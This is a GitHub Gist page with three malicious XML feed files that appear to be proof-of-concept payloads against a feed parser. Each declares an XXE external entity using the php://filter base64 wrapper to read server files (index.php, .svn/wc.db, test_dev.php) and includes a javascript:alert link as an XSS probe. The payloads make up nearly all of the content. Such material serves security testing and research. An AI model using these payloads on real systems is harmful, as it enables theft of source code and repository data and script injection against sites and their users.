Last active
November 3, 2018 14:57
-
-
Save h3xstream/d9998bd20e27ae981c29f896b2aec412 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [ | |
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" > | |
]> | |
<feed> | |
<title>test</title> | |
<description>test</description> | |
<entry> | |
<title>Test</title> | |
<link href="javascript:alert(11)"></link> | |
<content>&xxe;</content> | |
</entry> | |
</feed> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [ | |
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=.svn/wc.db" > | |
]> | |
<feed> | |
<title>test</title> | |
<description>test</description> | |
<entry> | |
<title>Test</title> | |
<link href="javascript:alert(11)"></link> | |
<content>&xxe;</content> | |
</entry> | |
</feed> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [ | |
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=test_dev.php" > | |
]> | |
<feed> | |
<title>test</title> | |
<description>test</description> | |
<entry> | |
<title>Test</title> | |
<link href="javascript:alert(11)"></link> | |
<content>&xxe;</content> | |
</entry> | |
</feed> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment